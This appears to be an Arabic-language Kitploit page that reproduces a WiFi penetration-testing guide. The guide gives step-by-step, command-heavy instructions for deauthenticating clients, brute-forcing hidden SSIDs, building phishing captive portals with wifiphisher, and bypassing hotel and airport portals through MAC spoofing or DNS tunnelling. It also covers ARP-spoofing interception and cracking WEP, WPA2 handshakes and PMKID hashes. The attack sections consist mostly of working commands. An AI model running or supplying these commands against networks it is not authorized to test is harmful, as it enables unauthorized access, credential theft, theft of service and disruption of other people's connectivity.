Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wifi-pentesting-guide — دليل اختبار اختراق شبكات WiFi | Kitploit
أدوات/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
كسر كلمات المرورتدقيق Wi-Fiجمع المعلوماتما بعد الاستغلالأمن الشبكات اللاسلكيةاختبار الاختراقالهندسة الاجتماعيةالتعلم والتعليم
GitHubricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

دليل اختبار اختراق شبكات WiFi

عرض المستودع
73411336منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

دليل اختبار اختراق شبكات WiFi

الفهرس

  1. الأوامر الأساسية

  2. الشبكات المفتوحة

    2.1. بوابات الأسر

    2.2. هجوم الوسيط

  3. كسر WEP

    3.1. بدون عملاء

  4. كسر WPA2-PSK

    4.1. كسر المصافحة الرباعية

    4.2. هجوم PMKID

    4.3. هجوم بدون نقطة وصول

  5. WPA2-Enterprise

    5.1. نقاط وصول وهمية

    5.2. القوة العمياء

    5.3. طرق EAP المدعومة

  6. هجمات أخرى

    6.1. هجوم Krack وهجوم Frag

    6.2. استخبارات المصادر المفتوحة

    6.3. تشويش WiFi

    6.4. أطر عمل أخرى

  7. ما بعد الاستغلال

    7.1. مهاجمة جهاز التوجيه

    7.2. أنواع الماسحات

    7.3. التزوير



1. الأوامر الأساسية

تعيين متغير بيئة

VARIABLE=value

التحقق من وضع الواجهة

iwconfig $IFACE

التحقق من حالة الواجهة

ifconfig $IFACE

تعيين وضع المراقبة

airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

سرد الشبكات

  1. تعيين وضع المراقبة

  2. تشغيل Airodump-ng

airodump-ng $IFACE -c $CHANNEL -e $ESSID

إلغاء المصادقة

  1. عميل واحد فقط
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. نقطة وصول (= جميع العملاء في نقطة الوصول)
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

الحصول على SSID المخفي مع عملاء

  1. سرد الشبكات

قم بسرد الشبكات باستخدام Airodump-ng واحصل على عنوان MAC لنقطة الوصول ($AP_MAC) وعنوان MAC لأحد العملاء ($CLIENT_MAC). لا توقف الالتقاط.

  1. إلغاء المصادقة

في محطة طرفية أخرى، قم بإلغاء مصادقة عميل أو جميعهم. عندما يلتقط Airodump-ng مصافحة من هذه الشبكة، سيظهر الاسم أو ESSID في المحطة الأولى:

aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

الحصول على SSID المخفي بدون عملاء

  1. سرد الشبكات

قم بسرد الشبكات باستخدام Airodump-ng واحصل على عنوان MAC لنقطة الوصول ($AP_MAC). لا توقف الالتقاط.

2.a. تنفيذ هجوم قاموسي

mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. أو تنفيذ هجوم بالقوة العمياء

mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

بالنسبة لمجموعة الأحرف، يمكن استخدام l (أحرف صغيرة)، u (أحرف كبيرة)، n (أرقام)، c (صغيرة+كبيرة)، m (صغيرة+كبيرة+أرقام) أو a (جميع الأحرف المطبوعة).



2. الشبكات المفتوحة

2.1. بوابات الأسر

2.1.1. بوابات أسر وهمية

  1. استنساخ موقع ويب باستخدام HTTrack

  2. تثبيت Wifiphiser. أضف نتيجة HTTrack في مجلد جديد داخل wifiphisher/data/phishing-pages/new_page/html وملف إعدادات في wifiphisher/data/phishing-pages/new_page/config.ini.

  3. أعد تجميع المشروع باستخدام python setup.py install أو الملف الثنائي في bin.

  4. هذا الأمر يعمل بشكل صحيح في أحدث إصدار من Kali بعد تثبيت hostapd:

cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. تجاوز 1: تزوير MAC

الطريقة الأولى لتجاوز بوابة الأسر هي تغيير عنوان MAC الخاص بك إلى عنوان أحد المستخدمين المُصدّق عليهم بالفعل.

  1. امسح الشبكة واحصل على قائمة عناوين IP و MAC. يمكنك استخدام:
  • nmap

  • سكريبت مخصص مثل هذا (Bash) أو هذا (Python)

  1. غير عنوان IP و MAC الخاصين بك. يمكنك استخدام:
  • macchanger

  • سكريبت مخصص مثل هذا (Bash)

أيضًا، يمكنك استخدام سكريبتات لأتمتة العملية مثل:

  • سكريبت Poliva

  • Hackcaptiveportals


2.1.3. تجاوز 2: نفق DNS

الطريقة الثانية هي إنشاء نفق DNS. لهذا، من الضروري أن يكون لديك خادم DNS خاص بك يمكن الوصول إليه. يمكنك استخدام هذه الطريقة لتجاوز بوابة الأسر والحصول على WiFi "مجاني" في الفنادق والمطارات...

  1. تحقق من أن أسماء النطاقات تُحل:
nslookup example.com
  1. أنشئ سجلين DNS (في Digital ocean، Afraid.org...):
  • سجل "A": dns.$DOMAIN يشير إلى $SERVER_IP (مثال: dns.domain.com 139.59.172.117)

  • سجل "NS": hack.$DOMAIN يشير إلى dns.$DOMAIN (مثال: hack.domain.com dns.domain.com)

  1. التنفيذ في الخادم
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. تحقق من عمله بشكل صحيح هنا

  2. التنفيذ في العميل

iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. إنشاء النفق
ssh -D 8080 [email protected]

2.2. هجوم الوسيط

بمجرد أن تكون في الشبكة، يمكنك اختبار ما إذا كانت عرضة لهجمات الوسيط.

  1. هجوم تزوير ARP باستخدام Ettercap

  2. استنشاق حركة المرور باستخدام Wireshark أو TCPdump

  3. تحليل حركة المرور باستخدام PCredz (لينكس) أو Network Miner (ويندوز)



3. كسر WEP

  1. بدء الالتقاط
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. تسريع التقاط IV باستخدام المصادقة المزيفة + هجوم إعادة تشغيل طلب ARP + إلغاء مصادقة المستخدم. أوقف Airodump عند حوالي 100.000 IV مختلف
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. كسر كلمة المرور باستخدام Aircrack-ng
aircrack-ng $PCAP_FILE


4. كسر WPA2-PSK

4.1. كسر المصافحة الرباعية

  1. بدء الالتقاط
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. إلغاء مصادقة مستخدم. أوقف التقاط airodump عندما ترى رسالة 'WPA handshake: $MAC'
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. الخيار 1: كسر المصافحة باستخدام Aircrack-ng
aircrack-ng -w $WORDLIST capture.cap

يمكنك الحصول على قوائم كلمات من هنا.

  1. الخيار 2: كسر المصافحة باستخدام Pyrit
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. هجوم PMKID

يمكنك استخدام هذا السكريبت أو اتباع هذه الخطوات:

  1. تثبيت Hcxdumptool و Hcxtool (يمكنك استخدام هذا السكريبت).

  2. إيقاف مدير الشبكة

airmon-ng check kill

3أ. إذا كنت تريد مهاجمة عنوان MAC معين

  • أنشئ ملف نصي ($FILTER_FILE) وأضف عنوان MAC بدون ":". يمكنك استخدام sed وتوجيه الإخراج إلى ملف:
echo $MAC | sed 's/://g' > $FILTER_FILE
  • التقاط PMKID
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. إنشاء $HASH_FILE
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

بنية كل سطر هي: PMKID * عنوان MAC للموجه * المحطة * ESSID (تحقق من: https://www.rapidtables.com/convert/number/hex-to-ascii.html)

  1. كسره باستخدام Hashcat (الخيار 16800)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force

4.3. هجوم بدون نقطة وصول

إذا كان لديك وصول إلى جهاز عميل مع تشغيل اتصال WiFi ولكن لا توجد شبكة حولك، فلا يزال بإمكانك مهاجمة تلك الشبكة إذا كان جهاز العميل قد اتصل بها سابقًا.

تنزيل الأداة